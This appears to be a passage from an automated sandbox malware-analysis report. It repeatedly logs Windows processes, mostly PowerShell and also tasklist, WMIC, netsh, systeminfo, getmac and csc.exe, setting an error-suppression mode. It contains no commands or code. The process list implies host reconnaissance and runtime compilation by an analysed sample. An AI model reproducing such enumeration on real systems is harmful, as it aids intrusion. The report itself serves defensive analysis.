              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
